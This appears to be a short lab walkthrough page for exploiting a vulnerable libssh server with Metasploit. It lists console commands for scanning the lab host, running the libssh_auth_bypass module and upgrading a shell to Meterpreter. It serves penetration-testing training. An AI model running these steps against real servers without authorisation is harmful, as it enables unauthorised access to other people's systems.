🔬SSH - MSF Exploit

Lab 1

🔬 Vulnerable SSH server

ip -br -c a
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.66.211.3
setg RHOST 192.66.211.3
workspace -a libssh
  • Perform an nmap scan directly into MSF

db_nmap -sS -sV -O 192.66.211.3
db_nmap -sS -sV -O 192.66.211.3
Metasploit - auxiliary/scanner/ssh/libssh_auth_bypass
  • Enumerate some information

  • Shell to Meterpreter post exploitation

shell_to_meterpreter

Last updated

Was this helpful?